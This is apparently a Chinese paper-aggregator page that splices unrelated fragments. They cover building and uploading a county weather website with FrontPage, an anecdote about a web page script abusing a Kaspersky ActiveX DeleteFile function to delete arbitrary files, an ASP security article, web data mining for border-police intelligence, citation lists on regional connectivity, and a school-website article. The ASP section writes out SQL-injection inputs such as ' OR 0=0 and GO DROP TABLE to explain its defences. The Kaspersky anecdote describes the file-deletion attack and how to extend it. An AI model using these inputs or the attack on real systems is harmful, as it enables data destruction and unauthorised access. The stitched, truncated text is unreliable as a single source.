时间:2022-04-19 23:31:47
>> 基层气象网络信息系统建设的现状与前景分析 浅谈气象网站网络安全设计与实现 概论气象网站安全隐患及解决方法 基于NTP的气象网络校时系统的研究和实现 浅谈当前县级气象网络安全存在的隐患及对策 IRF虚拟化技术在气象网络中的应用 VPN技术在安阳气象网络中的应用 简单阐述气象网络安全 气象网络设备监控系统 气象网络管理与维护探讨 关于蓬莱道德工程建设的思考 《蓬莱宴》新探论 省级气象网络安全分析及防范探析 浅论气象网络安全及其对策 气象网络系统信息安全问题初探 直管市气象网络安全管理初探 基于的市级气象服务平台(网站)开发建设 浅谈区县级气象部门网站建设架构 论党建网站建设的文化效用 论网站建设过程中的优化策略 常见问题解答 当前所在位置:)为例,解释网页内容及超链接的编辑过程。FrontPage是Office自带的一款可视化网页编辑软件,是制作静态网站经常用到的基础软件。
3.1 新建网页
打开FrontPage软件,进入网站所在目录,“文件”-“新建”,选择“空白网页”,此时出现一个上部为代码区,下部为设计区的空白网页(图6)。在此界面下,可同时查看网页代码和网页视图的编辑情况,可根据各自习惯在代码区或者视图区编辑内容。
当图片内容和文字内容插入、编辑完毕后,可在设计视图(图7)下稍作修饰,然后在预览视图下进行预览,满意后保存文件,即成为一个完整充实的网页(图8)。
打开首页面“index.htm”,选中导航栏中的“天气预报”,右击选择“超链接属性”,出现“编辑超链接”对话框(图9)。选择浏览文件,出现“链接到文件”对话框(图10),选中“yb.htm”,它将自动置入“编辑超链接”对话框中的地址栏,最后单击“确定”就完成了导航栏中“天气预报”项目到具体预报内容页面的链接过程。其他页面的链接过程与此类同,超链接过程完成后,永久有效,日后对预报等内容的更新,只需编辑修改“yb.htm”等子页面的内容即可,超链接不必重复操作。
4 内容上传与网页浏览
网站在单机编辑完成后,必须到服务器空间,并且在浏览器地址栏输入正确的域名后才能在互联网上被正确访问。下面以“蓬莱气象网”的首页“index.htm”为例,介绍网页上传的步骤。输入服务器地址登陆空间,是上传网页的方法之一,步骤是“资源管理器”,地址栏输入ftp://plqxjcom:**********/www,其中“plqxjcom”是我们所在服务器上的用户名,“**********”代表10为数的密码,“”是服务器地址,“www”是存储此网页的文件夹。地址输入完毕后回车,便进入了服务器空间,然后将编辑好的“index.htm”页面复制到此空间的“www”文件夹下,上传任务即完成(图11)。
网站内容上传成功后,在浏览器地址栏输入域名“”便可浏览到网站内容(图12)。
目前“蓬莱气象网”已被百度和Google等大型搜索引擎检索收录(图13),搜索“蓬莱气象”,本站在百度和Google均排在第一位。
杀毒软件平时是响当当的“权威人士”,我们信任它们,让它们来保护电脑。但是任何事物都具有两面性,当我们看到其优秀的一面时,也要同时看到其不足之处。除了前言提到的误杀事件外,杀毒软件自身的一些漏洞也可能被黑客利用(图1),对用户的电脑造成伤害,笔者最近就碰到了一次。
桌面消失了
那天,笔者上班后照常打开电脑,登录QQ发现有条留言,同事发来了一个内部网页。打开这个网页后不久,就听到硬盘一阵旋转后很快就停了下来,笔者也没有在意,继续看网页。但我返回桌面后不禁大吃一惊,桌面上的图标全部消失了,只剩下光秃秃的壁纸。
是什么原因让桌面图标消失的呢?一下子我就联想到最近国外杀毒软件频频出现的“误杀”事件,难道又是这些杀毒软件在“兴风作浪”?恰好笔者安装的就是《卡巴斯基》,于是立即重新启动操作系统,但发现系统并没有崩溃,能进入系统,也能从“开始”菜单中运行程序。
问题出在网页中
既然是访问网页的时候出现的问题,于是我再次打开那个网页,并查看其源代码,果然在其中发现了一段可疑的脚本代码。仔细分析,正是该脚本调用了系统中的一个函数接口,删除了桌面图标。再通过注册表文件来查看该系统组件所对应的文件,结果吓一跳,它对应的文件就在《卡巴斯基》目录中。难道《卡巴斯基》又出现了漏洞?
明显是被同事“阴”了,找到这个恶作剧的同事,我才知道其中的原理。杀毒软件在查杀过程中都会使用自带的一个组件来进行清理操作,这个组件在安装时就被直接安装进入Windows系统,比如在《卡巴斯基》的程序安装过程中,就会将一个名叫“AxKLProd60.dll”的库文件注册为系统组件,这个组件的KLProd60类中提供了一个名为DeleteFile的函数,这个函数就是用于清除病毒文件的(图2)。
该组件本身没有问题,但是被调用的时候却不够严谨。换句话说,如果可以通过某种方式调用这个函数的话,理论上就能够删除系统中的任意文件。
后果很严重
这引起我的研究兴趣了,我将原来的网页脚本进行了一番修改,目的是验证安装了《卡巴斯基》的用户,会不会在毫不之情的情况下被莫名其妙地删除文件。为了保证系统安全,我在文件被删除以前对其进行了备份。打开记事本输入如图3的代码,并将其另存为一个网页文件。
在本地计算机打开这个网页,如果是Windows XP SP2或者Windows Vista系统的话,IE浏览器会弹出一个安全提示,成功执行该网页后果然发现那文件被删除了。如果将该网页文件上传到网站空间,在访问该文件以后同样可以删除硬盘中的指定文件,而且浏览器还不会出现任何的安全提示。
同样,无论是在本地还是在网络空间运行该网页文件,即使有UAC保护下的Vista系统,这个漏洞也可以被利用。
写在最后
笔者所进行的测试比较简单,如果有人对这个漏洞重写代码,利用For循环对磁盘文件扫描后,就可以在瞬间删除系统中所有指定类型的文件。
论文摘要:网络上的动态网站以ASP为多数,我们学校的网站也是ASP的。笔者作为学校网站的制作和维护人员,与ASP攻击的各种现象斗争了多次,也对网站进行了一次次的修补,根据工作经验,就ASP网站设计常见安全漏洞及其防范进行一些探讨。本文结合ASP动态网站开发经验,对ASP程序设计存在的信息安全隐患进行分析,讨论了ASP程序常见的安全漏洞,从程序设计角度对WEB信息安全及防范提供了参考。
1网络安全总体状况分析
2007年1月至6月期间,半年时间内,CNCERT/CC接收的网络仿冒事件和网页恶意代码事件,已分别超出去年全年总数的14.6%和12.5%。
从CNCERT/CC掌握的半年情况来看,攻击者的攻击目标明确,针对不同网站和用户采用不同的攻击手段,且攻击行为趋利化特点表现明显。对政府类和安全管理相关类网站主要采用篡改网页的攻击形式,也不排除放置恶意代码的可能。对中小企业,尤其是以网络为核心业务的企业,采用有组织的分布式拒绝服务攻击(DDoS)等手段进行勒索,影响企业正常业务的开展。对于个人用户,攻击者更多的是通过用户身份窃取等手段,偷取该用户游戏账号、银行账号、密码等,窃取用户的私有财产。
2用IIS+ASP建网站的安全性分析
微软推出的IIS+ASP的解决方案作为一种典型的服务器端网页设计技术,被广泛应用在网上银行、电子商务、网上调查、网上查询、BBS、搜索引擎等各种互联网应用中。但是,该解决方案在为我们带来便捷的同时,也带来了严峻的安全问题。本文从ASP程序设计角度对WEB信息安全及防范进行分析讨论。
3SP安全漏洞和防范
3.1程序设计与脚本信息泄漏隐患
bak文件。攻击原理:在有些编辑ASP程序的工具中,当创建或者修改一个ASP文件时,编辑器自动创建一个备份文件,如果你没有删除这个bak文件,攻击者可以直接下载,这样源程序就会被下载。
防范技巧:上传程序之前要仔细检查,删除不必要的文档。对以BAK为后缀的文件要特别小心。
inc文件泄露问题。攻击原理:当存在ASP的主页正在制作且没有进行最后调试完成以前,可以被某些搜索引擎机动追加为搜索对象。如果这时候有人利用搜索引擎对这些网页进行查找,会得到有关文件的定位,并能在浏览器中查看到数据库地点和结构的细节,并以此揭示完整的源代码。
防范技巧:程序员应该在网页前对它进行彻底的调试。首先对.inc文件内容进行加密,其次也可以使用.asp文件代替.inc文件,使用户无法从浏览器直接观看文件的源代码。
3.2对ASP页面进行加密。为有效地防止ASP源代码泄露,可以对ASP页面进行加密。我们曾采用两种方法对ASP页面进行加密。一是使用组件技术将编程逻辑封装入DLL之中;二是使用微软的ScriptEncoder对ASP页面进行加密。3.3程序设计与验证不全漏洞
验证码。普遍的客户端交互如留言本、会员注册等仅是按照要求输入内容,但网上有很多攻击软件,如注册机,可以通过浏览WEB,扫描表单,然后在系统上频繁注册,频繁发送不良信息,造成不良的影响,或者通过软件不断的尝试,盗取你的密码。而我们使用通过使用验证码技术,使客户端输入的信息都必须经过验证,从而可以解决这个问题。
登陆验证。对于很多网页,特别是网站后台管理部分,是要求有相应权限的用户才能进入操作的。但是,如果这些页面没有对用户身份进行验证,黑客就可以直接在地址栏输入收集到的相应的URL路径,避开用户登录验证页面,从而获得合法用户的权限。所以,登陆验证是非常必要的。
SQL注入。SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别,所以目前市面的防火墙都不会对SQL注入发出警报,如果管理员没查看IIS日志的习惯,可能被入侵很长时间都不会发觉。
SQL注入攻击是最为常见的程序漏洞攻击方式,引起攻击的根本原因就是盲目信任用户,将用户输入用来直接构造SQL语句或存储过程的参数。以下列出三种攻击的形式:
A.用户登录:假设登录页面有两个文本框,分别用来供用户输入帐号和密码,利用执行SQL语句来判断用户是否为合法用户。试想,如果黑客在密码文本框中输入''''OR0=0,即不管前面输入的用户帐号和密码是什么,OR后面的0=0总是成立的,最后结果就是该黑客成为了合法的用户。
B.用户输入:假设网页中有个搜索功能,只要用户输入搜索关键字,系统就列出符合条件的所有记录,可是,如果黑客在关键字文本框中输入''''GODROPTABLE用户表,后果是用户表被彻底删除。
C.参数传递:假设我们有个网页链接地址是HTTP://……asp?id=22,然后ASP在页面中利用Request.QueryString[''''id'''']取得该id值,构成某SQL语句,这种情况很常见。可是,如果黑客将地址变为HTTP://……asp?id=22anduser=0,结果会怎样?如果程序员有没有对系统的出错提示进行屏蔽处理的话,黑客就获得了数据库的用户名,这为他们的进一步攻击提供了很好的条件。
解决方法:以上几个例子只是为了起到抛砖引玉的作用,其实,黑客利用“猜测+精通的sql语言+反复尝试”的方式,可以构造出各种各样的sql入侵。作为程序员,如何来防御或者降低受攻击的几率呢?作者在实际中是按以下方法做的:
第一:在用户输入页面加以友好备注,告知用户只能输入哪些字符;
第二:在客户端利用ASP自带的校验控件和正则表达式对用户输入进行校验,发现非法字符,提示用户且终止程序进行;
第三:为了防止黑客避开客户端校验直接进入后台,在后台程序中利用一个公用函数再次对用户输入进行检查,一旦发现可疑输入,立即终止程序,但不进行提示,同时,将黑客IP、动作、日期等信息保存到日志数据表中以备核查。
第四:对于参数的情况,页面利用QueryString或者Quest取得参数后,要对每个参数进行判断处理,发现异常字符,要利用replace函数将异常字符过滤掉,然后再做下一步操作。
第五:只给出一种错误提示信息,服务器都只提示HTTP500错误。
第六:在IIS中为每个网站设置好执行权限。千万别给静态网站以“脚本和可执行”权限。一般情况下给个“纯脚本”权限就够了,对于那些通过网站后台管理中心上传的文件存放的目录,就更吝啬一点吧,执行权限设为“无”好了。
第七:数据库用户的权限配置。对于MS_SQL,如果PUBLIC权限足够使用的绝不给再高的权限,千万不要SA级别的权限随随便便地给。
3.4传漏洞
诸如论坛,同学录等网站系统都提供了文件上传功能,但在网页设计时如果缺少对用户提交参数的过滤,将使得攻击者可以上传网页木马等恶意文件,导致攻击事件的发生。
防文件上传漏洞
在文件上传之前,加入文件类型判断模块,进行过滤,防止ASP、ASA、CER等类型的文件上传。
暴库。暴库,就是通过一些技术手段或者程序漏洞得到数据库的地址,并将数据非法下载到本地。
数据库可能被下载。在IIS+ASP网站中,如果有人通过各种方法获得或者猜到数据库的存储路径和文件名,则该数据库就可以被下载到本地。
数据库可能被解密
由于Access数据库的加密机制比较简单,即使设置了密码,解密也很容易。因此,只要数据库被下载,其信息就没有任何安全性可言了。
防止数据库被下载。由于Access数据库加密机制过于简单,有效地防止数据库被下载,就成了提高ASP+Access解决方案安全性的重中之重。以下两种方法简单、有效。
非常规命名法。为Access数据库文件起一个复杂的非常规名字,并把它放在几个目录下。
使用ODBC数据源。在ASP程序设计中,如果有条件,应尽量使用ODBC数据源,不要把数据库名写在程序中,否则,数据库名将随ASP源代码的失密而一同失密。
使用密码加密。经过MD5加密,再结合生成图片验证码技术,暴力破解的难度会大大增强。
使用数据备份。当网站被黑客攻击或者其它原因丢失了数据,可以将备份的数据恢复到原始的数据,保证了网站在一些人为的、自然的不可避免的条件下的相对安全性。
3.5SP木马
由于ASP它本身是服务器提供的一项服务功能,所以这种ASP脚本的木马后门,不会被杀毒软件查杀。被黑客们称为“永远不会被查杀的后门”。我在这里讲讲如何有效的发现web空间中的asp木马并清除。
技巧1:杀毒软件查杀
一些非常有名的asp木马已经被杀毒软件列入了黑名单,所以利用杀毒软件对web空间中的文件进行扫描,可以有效的发现并清除这些有名的asp木马。
技巧2:FTP客户端对比
asp木马若进行伪装,加密,躲藏杀毒软件,怎么办?
我们可以利用一些FTP客户端软件(例如cuteftp,FlashFXP)提供的文件对比功能,通过对比FTP的中的web文件和本地的备份文件,发现是否多出可疑文件。
技巧3:用BeyondCompare2进行对比
渗透性asp木马,可以将代码插入到指定web文件中,平常情况下不会显示,只有使用触发语句才能打开asp木马,其隐蔽性非常高。BeyondCompare2这时候就会作用比较明显了。
技巧4:利用组件性能找asp木马
如:思易asp木马追捕。
大家在查找web空间的asp木马时,最好几种方法结合起来,这样就能有效的查杀被隐藏起来的asp木马。
结束语
总结了ASP木马防范的十大原则供大家参考:
建议用户通过FTP来上传、维护网页,尽量不安装asp的上传程序。
对asp上传程序的调用一定要进行身份认证,并只允许信任的人使用上传程序。
asp程序管理员的用户名和密码要有一定复杂性,不能过于简单,还要注意定期更换。
到正规网站下载asp程序,下载后要对其数据库名称和存放路径进行修改,数据库文件名称也要有一定复杂性。
要尽量保持程序是最新版本。
不要在网页上加注后台管理程序登陆页面的链接。
为防止程序有未知漏洞,可以在维护后删除后台管理程序的登陆页面,下次维护时再通过上传即可。
要时常备份数据库等重要文件。
日常要多维护,并注意空间中是否有来历不明的asp文件。
一旦发现被人侵,除非自己能识别出所有木马文件,否则要删除所有文件。重新上传文件前,所有asp程序用户名和密码都要重置,并要重新修改程序数据库名称和存放路径以及后台管理程序的路径。
做好以上防范措施,您的网站只能说是相对安全了,决不能因此疏忽大意,因为入侵与反入侵是一场永恒的战争!网站安全是一个较为复杂的问题,严格的说,没有绝对安全的网络系统,我们只有通过不断的改进程序,将各种可能出现的问题考虑周全,对潜在的异常情况进行处理,才能减少被黑客入侵的机会。
参考文献
[1]袁志芳田晓芳李桂宝《ASP程序设计与WEB信息安全》中国教育信息化2007年21期.
关键词:Web数据挖掘,边防情报,应用模式
随着科学技术的突飞猛进,社会信息化的快速发展, 以信息技术为主要标志的高新技术革命已经引起了社会各个领域的深刻变革,网络已经成为社会生活不可分割的一部分。每天有数以亿计的网民在互联网上浏览、发布信息,互联网已经成为信息时代最为重要的信息集散地。对于边防情报部门而言,研究如何通过互联网和公安网快速高效地进行情报收集,使各项工作都围绕收集、运用情报而展开,已经成为当务之急。Web数据挖掘技术的兴起,为边防情报部门开展工作提供了高效的工具与手段。
一、Web数据挖掘技术
Web数据挖掘技术是由传统数据库领域的数据挖掘技术演变而来。数据挖掘就是从大量的、不完全的、有噪声的、模糊的、随机的原始数据中,提取隐含在其中的、事先未知的、但又潜在有用的信息的过程;它是从数据仓库中提取出可信的、新颖的、有效的,并能被人理解的模式的高级处理过程。数据挖掘出现于20世纪80年代,它不仅面向特定数据库的简单检索查询调用,而且要对这些数据进行深入的统计、分析和推理,发掘数据间的相互关系,完成从业务数据到决策信息的转换。数据挖掘技术把人们对数据的应用,从低层次的末端查询提高到为决策者提供决策支持。随着互联网的蓬勃发展,数据挖掘技术被运用到网络上,并根据网络信息的特点发展出了新的理论与方法,演变成为Web数据挖掘技术。Web数据挖掘是指从与WWW有关的资源和行为中抽取人们感兴趣的、有用的模式和隐含信息,所挖掘出的知识能够用于信息管理、查询处理、决策支持、过程控制等方面。Web数据挖掘已经成为对互联网信息进行深度分析、开发与利用的重要手段。
二、Web数据挖掘的分类
(一)Web内容挖掘
Web内容挖掘是指从互联网上检索资源,从相关文件内容及描述信息中获取有价值的潜在信息。根据处理对象的不同,Web内容挖掘分为文本挖掘和多媒体挖掘。网上信息形式多以文本信息的形式存在。文本可以被看作是一种顺序数据,目前有许多适合于顺序数据的挖掘方法。Web文本信息挖掘的主要任务一般限定在文本特征的表示、文本的总结,以及文本的分类和聚类等方面。互联网现有大量多媒体信息。对该类信息进行分析挖掘,找出合适的描述模式,阐述并理解其中的意义,可提高该类信息的识别度及检索效率,也是Web多媒体挖掘的目标。论文大全。目前此方面应用的技术手段主要是语音信息的理解及识别、图形图像信息的理解及识别,以及信息检索等。
(二) Web结构挖掘
Web结构挖掘的目标是Web文档的链接结构,目的在于揭示蕴涵于文档结构中的信息,主要方法是通过对Web站点的结构进行分析、变形和归纳,将Web页面进行分类,以利于信息的搜索。对Web页的链接结构进行分类,可以识别判断页面与文档间的各种属性关系。由于Web页的内外部存在具有各种属性关系的结构信息,通过研究Web结构信息,可得到相关主题、相关分类的页面集合,生成关于某个Web站点的结构和页面结构的概括信息。因此,结构挖掘的重点在于链接信息。
(三) Web日志挖掘
Web日志挖掘是从服务器访问日志、用户策略、用户对话和事物处理信息中得到用户的访问模式和感兴趣的信息,并尽可能预测用户的行为。通过对用户所访问页面、文档等的技术分析,Web日志挖掘可以找出相关主题间、相关内容间的联系规律。访问分析又称使用分析,主要使用用户基本信息如IP、ID、URL、日期、时间等进行处理。由于Web服务器的Log日志存在完整的结构,当用户访问Web站点时,相关的页面、文档、链接等信息在日志中都做了相应的记录。Web日志挖掘不仅要找出用户经常访问的URL路径,而且也要找出用户有可能要访问的相关站点的链接。利用这种方法,可以获知互联网使用者的行为偏好。
三、Web数据挖掘的主要方法
(一)统计分析方法
统计分析(statistical)方法是通过对总体中的样本数据进行分析,从而描述和推断能够揭示总体中的内部规律的信息和知识的方法。为了适应复杂信息的挖掘需求,往往依赖有明确目标和任务的概率模型。数据挖掘的统计模型要适合于所要提取的对象。利用统计分析技术可以对我们感兴趣的内容进行蕴含信息的挖掘。如对互联网日志进行统计可以获得有关站点使用的基本信息,包括页面访问次数、日平均访问人数、最受用户欢迎的页面等。除此以外,还可以进行错误分析,如非法用户登录等。这些统计数据都是基于用户浏览页面的时间、用户的浏览路径和路径长度等信息。这些统计数据对于提高系统的性能、安全性以及优化站点结构大有帮助。目前已有许多互联网流量分析工具实现了这些基本的统计功能。
(二)关联分析方法
关联分析(associationanalysis)用于发现关联规则,所谓关联规则是指在大量的数据中所隐含的项集之间的关系以及项集的频繁模式。用户在浏览网页时,经常会在同一次访问中浏览一些无顺序关系的页面集合,挖掘发现的这些页面之间内在的联系,就是就表现为它们之间存在一定的关联。如果关联规则中的页面之间没有超链接,则应该引起我们的特别关注。通常使用可信度、支持度、期望可信度和作用度这四个参数来描述关联规则。
(三)分类方法
分类(classification)是找出描述并区分数据类或概念的模型(或函数),以便能够使用模型预测类标记未知的对象类。分类不同于聚类,聚类无须事先制定标准,而能从信息本身出发,利用算法自动分类;而分类的准则是事先定好的。在Web数据挖掘中,分类主要是将用户配置文件归属到既定的用户类别,网页根据内容的属性分类等。分类技术要求抽取关键属性描述已知的信息,可以通过指导性归纳学习算法进行分类,主要包括决策树分类法、贝叶斯分类法、最近邻分类法等。
(四)聚类分析方法
聚类(clustering)就是将数据对象分组成为多个类或簇,在同一个簇中的对象之间具有较高的相似度,而不同簇中的对象差别较大。聚类分析能够将一批数据按照它们在性质上的亲密程度,在没有先验知识的情况下自动进行分类,每一类都是大量具有相似性个体的集合,不同类之间具有明显的区别。聚类分析是一种探索性分析,在分类过程中,人们不必事先给出一个分类的标准,聚类分析能够从信息本身出发,自动进行分类。例如在Web日志挖掘中,聚类分析主要集中于用户聚类和页面聚类。用户聚类将具有相似浏览行为的用户归类;页面聚类则是将内容相关的页面归类,搜索引擎可以利用这些信息为某个查询提供用户感兴趣的相关超链接。
四、Web数据挖掘在边防情报工作中的应用模式
(一)Web数据挖掘在建立公安网搜索引擎中的应用
目前,边防情报部门所需的公开信息大部分来源于互联网和公安网,情报人员通过使用搜索引擎来快速查询需要的信息,然而公安网的搜索引擎存在较大局限性,搜索出来的结果存在大量冗余信息,不能满足情报人员的需求。因此,在搜索引擎中通过借鉴Web数据挖掘技术可以有效地提高查准率和查全率,从而给情报人员提供较有准确的信息。具体应用方法如下:
1.根据公安网的页面内容,自动形成摘要
目前,使用公安网搜索引擎进行检索,检索的结果文档是以简单摘要形式出现的,它表现为机械地提取网页内容取前几句为摘要,这种仅通过位置进行自动摘要是很难真正反映出网页中的信息内容。论文大全。在文本挖掘中的文本抽取技术是指从文档中抽取出关键信息,然后以简洁的形式对文档的信息进行摘要或描述,即文本抽取技术是根据Web文档本身的内容,从Web页中提炼出重要信息形成文档摘要,而不是根据位置来进行文本内容的概括,因此它更能够反映出Web文档中的真正信息。论文大全。这样,情报人员通过浏览关键词就可以了解网页的大致内容,从而决定是否使用该信息。
2.根据检索结果,自动进行文档聚类
文本聚类是文本分类的逆向过程,是指将文档集中的文档分为更小的簇,要求同一簇内文档之间的相似性尽可能大,而簇与簇之间的关系尽可能小,这些簇相当于分类表中的类目。情报人员在使用搜索引擎时,会得到大量的返回信息组成的线性表,而其中很大一部分是与其查询请求不相关的,于是通过对检索结果的文档集合进行聚类,可以使得与用户检索结果相关的文档集中在一起,并远离那些不相关的文档。再将处理以后的信息以超链接结构组织的层次方式可视化地提供给情报人员,从而大大减短浏览时间。
(二)Web数据挖掘在建立公安网站中的应用
公安网网站是公安网信息的容纳处,我们可以利用Web数据挖掘技术有效地组织网站信息,建立一个资源优化的网站,也就是说通过对网站内容的数据挖掘,主要是对文本内容的挖掘,如采用自动归类技术实现网站信息的层次性组织;以及结合对用户访问日志记录信息的挖掘,把握用户的兴趣,开展网站信息推送服务。
1.采用自动归类技术,实现公安网网站信息层次化
一般而言,网站提供给访问者的信息和服务应该是按优先次序进行排列,网站维护人员应该把重要的信息放在醒目的位置,因此在网站维护时,通过对网站内容挖掘和Web日志挖掘,可以有效地组织网站信息。例如:采用自动归类技术实现网站信息层次化;分析访问者的访问行为,可为用户提供智能化、个性化服务。还可根据访问者的访问兴趣、访问频度、访问时间,动态地调整页面结构。
2.采用日志挖掘技术,实现公安网网站信息推送服务
网站可以根据访问者的浏览情况,发现访问者的兴趣,定期为注册用户提供相关信息,并且调整网站中网页的链接结构和内容,为访问者提供个人定制服务。具体步骤为:首先将日志文件中的数据经过预处理,形成原始数据库;然后获取用户的访问模式,放入用户访问模式数据库;再通过数据挖掘和模式分析形成知识数据库,Web服务器自动更新知识数据库,采用动态主页设计方法,根据用户的知识信息,提供相应的个性化主页。在数据预处理过程中会话识别是重要的一步,它取决于用户访问模式的有效性和准确性。为提高准确性,可采用Cookie法进行会话识别。在呈现个性化主页时,利用用户的IP地址和Cookie值查询知识数据库,发现用户频繁访问的路径,并自动形成相应链接,根据相似用户群和相关Web页推荐给用户。由于是经过挖掘和分析后所产生的动态主页,相对于一般的主页,其针对性更强,更受用户的欢迎。
参考文献:
[1]叶鹰.情报学基础教程[M].科学出版社,2006
[2]栗湘等.Web挖掘应用研究[J]情报理论与实践,2005,(6)
[3]曼丽春等.Web数据挖掘研究与探讨[J].现在电子技术,2006,(8)
[4]徐险峰.基于Web的网络数据挖掘技术[J].情报杂志,2005,(3)
>> 互联互通:经济新常态下的国家战略 中国国家安全战略 APEC与互联互通 中国与印尼:共同推进海上全球互联互通 中国与东盟互联互通的经济效应探讨 中国与泰国互联互通难在何处 结构型战略能力与中国国家安全 中国国家安全战略走向 走好中国―东盟互联互通之路 网间互联互通 互联互通2004 东亚互联互通战略多维内涵与时代价值 互联互通战略与东亚区域一体化的推进 网络效应、互联互通与来自中国电信业的经验 中国与东盟互联互通建设及对南亚合作的启示 美国新版国家安全战略的“变”与“不变” 环境问题与美国国家安全战略 越南国家安全战略与南海争端 东亚的互联互通 互联互通要论 常见问题解答 当前所在位置:l,2012年06月19日。
[美]索尔・科恩:《地缘政治学:国际关系的地理学》,上海社会科学院出版社,2011年,第265页。
[英]戴维斯:《云南:连接印度和扬子江的链环》,李安泰等译,昆明:云南人民出版社,2001年,第8页。
杨梅:《近代西方人在云南的探查活动及其著述》,云南大学博士论文,第61页。
李晨阳:《你好,中国东盟互联互通之路》,《世界知识》,2015年第1期,第73页。
梁志明:《论日本对东南亚的占领及其影响》,《世界历史》,1995年第4期,第28页。
《中缅油气管道天然气31日进入中国,年输气120亿立方》,2013年07月31日,中新网,。
朱惠悦:《中缅油气管道十年终建成,中国第四条能源进口通道将启用》,转引自中国管道商务网,http://,2015-1-23。
《重审中缅油气管道》,http:///20130617/n379018000.shtml。
"Master Plan on ASEAN Connectivity", Jakarta, ASEAN Secretariat, January 2011, p.13.
"Bridges Across Oceans Initial Impact Assessment of the Philippines Nautical Highway System and Lessons for Southeast Asia", ADB, 2010.
土瓦(Dawei)是缅甸南部德林达依省的首府,与泰国西部的北碧府相邻。土瓦也是重要港口,面向印度洋安达曼海,是缅甸从事对外贸易和发展海洋经济的重要港口城市。
Ranjana Narayan, "India's Acting East Policy to focus on timelines, economic benefits", Tangerine Digital Entertainment Pvt. Ltd., August 25, 2014.
宋哲、马丹丹:《冷战后印度同湄公河流域国家关系的发展及其影响》,《印度洋经济体研究》,2014年第5期,第92页。
关于APEC领导人北京会议提出的相关议题,参阅《亚太经合组织互联互通蓝图(2015―2025)》,《人民日报》,2014年11月12日,第 11 版。
[葡萄牙]托梅・皮里士:《东方诸国记》,转引自卢苇:《南海丝绸之路与东南亚》,《海交史研究》,2008年第2期,第13页。
樊树志:《国史十六讲》,北京:中华书局,2006年,第227页。
杨金森:《中国海洋战略研究文集》,北京:海洋出版社,2006年,第7~8页。
《中国古代航海史》,北京:海洋出版社,1989年,转引自杨金森:《中国海洋战略研究文集》,北京:海洋出版社,2006年,第9页。
《新唐书・地理志》,转引自卢苇:《南海丝绸之路与东南亚》,《海交史研究》,2008年第2期,第6页。
关键词 职业学校 网站开发 维护 应用
中图分类号:TP311.52 文献标识码:A DOI:10.16400/ki.kjdks.2015.01.073
1 网站建设的重要性
加强教学交流,优化教育资源:中职学校门户网站是提供教学交流的一种新型模式。上传到网站上的各种优秀教案、论文、公开课、教学素材、多媒体课件等内容为师生教学交流提供了良好的平台,提高了工作学习效率。同时,它也是实现教育资源合理分配的重要桥梁,使天南地北的师生不再受到学校水平、教材、教师能力的限制,共享教学资源。
加强文化建设,提高学生素养:中职学校门户网站是学校的“商标”。每一所学校都有自己的特色与文化,将这种文化通过网络传输给教师、学生、家长和社会,让大家认同并学习这种既定的观念,促进学校文化建设的发展。
加强宣传力度,提升学校形象:中职学校门户网站是学校信息传递的窗口。塑造学校形象,必须重视学校外部形象的设计和学校形象的宣传。通过网站这个窗口,学校把自己最亮丽的一面呈现给社会,让社会各界了解学校办学特色、办学优势。
加强校企合作,促进就业服务:中职学校门户网站是学校与企业联系的纽带。学校通过与企业互相链接、合作信息等形式加强校企合作,同时,学校也企业介绍、招工信息等为学生提供就业指导服务。
2 网站开发的过程
系统分析:根据中职学校已有的网站制作经验、计算机技术、硬件设备、有限的经费来源和教师寒暑假休息等有利条件,学校通过自己的能力建立门户网站是可行的。经过分析,中职学校门户网站需要图文信息、教学资源共享、电子公告栏、网上留言、BLOG或论坛、在线视频、专题介绍、广告条、后台等功能。网站要有较快的访问速度,较好的数据延续性,很强稳定性和很好安全性。网站页面总体风格统一。
总体设计:①总体设计主要是对网站栏目、首页以及子页面的规划。根据中职学校的特点,可将栏目分为公告栏、学校概况、新闻中心、教学科研、德育之窗、招生就业、校企合作、培训鉴定、教师园地、学生天地、家校联系、政策法规、校长工作室、专业部动态、图片中心、下载中心、在线视频、网上留言等。每个栏目一般可以划分若干个子栏目。首页将主要呈现整个网站的最新信息和整体风格,实时提供校园新闻以及其它凸显学校特色的内容。栏目页面和内容页面将主要呈现该模块的最新信息和相关内容。
详细设计与实现:经过前期的分析和初步设计,中职学校门户网站的需求和总体要求已经明确,接下来的工作就是开发实现了。现就网站关键功能实现和数据库设计作简要介绍。
2.1 网站关键功能实现
(1)ASP无组建上传:②所谓无组件上传,就是不使用第三方组件,直接上传文件。实际上就是利用表单将所有文件和其他说明信息等当作二进制数据提交上去,然后自己手工从中分析出文件名称、文件大小、文件内容、文件说明等信息。其主要步骤为:剖析上传数据的格式、数据分析准备工作、从二进制字符串中提取数据。
(2)模板技术实现:使用模板实现ASP代码与页面分离,以后用asp就可以更方便地进行前后台分开制作,在很短的时间内可以替换整个站点的外观,使程序员可以抽象编程,而无须接触HTML代码,还可以重复利用以前的模板。通常在使用模板的情况下,都只要在最后一行加上显示页面的语句。因此整个程序显得十分清晰。此时,只要对模板文件进行编辑,就可以改变整个页面的外观。至于模板文件,它可以是任何文件,如HTML文件、ASP文件,甚至是程序本身,而且在一个程序中可以装载多个模板配合使用,这样不(下转第178页)(上接第141页)仅具有极大灵活性,而且模板文件与ASP程序的相关性可减到最低程度。
(3)html静态网页生成:网页生成静态html文件有许多好处,比如生成html网页有利于被搜索引擎收录,不仅被收录的快还收录的全。前台脱离了数据访问,减轻对数据库访问的压力,加快网页打开速度。但生成HTML页面无形中也耗费大量的磁盘空间以存放这些静态文件,在编辑页面过程中除读写数据库外,也要读写服务器磁盘,页面样式的改动必须重新生成全部HTML文件。
2.2 数据库设计③
一个现实、完整的网站要维护业务往来需要保留大量的数据,而且这些数据之间往往还有着很多密不可分的关系,因此,利用数据库来规范这些数据,可以很便利的录入、查询和更新这些数据。数据库有Access数据库、Oracle和SQL Server等诸多种类,其中SQL Server是一种高效的关系型数据库,它与Windows NT/2003等操纵系统紧密集成,对于今天复杂的B/S架构系统来说,SQL Server是较好的选择。
网站测试:网站测试就是利用测试工具或人工按照测试方案和流程对网站进行功能和性能测试,其目的是为了发现网站中存在的错误。当然,测试并不仅仅是为了找出错误,通过分析错误产生的原因和错误的发生趋势,可以帮助网站制作者发现当前网站开发过程中的缺陷,以便及时改进。
3 网站维护及应用
Web服务器安全性设置:在服务器上安装好操作系统之后,最好能在网站上线之前就完成补丁的安装,配置好网络后,然后点击开始Windows Update,安装所有的关键更新,并安装杀毒软件。同时,要在服务器上设置好端口保护和防火墙、禁用不必要的服务、卸载不安全的组件、防止列出用户组和系统进程。
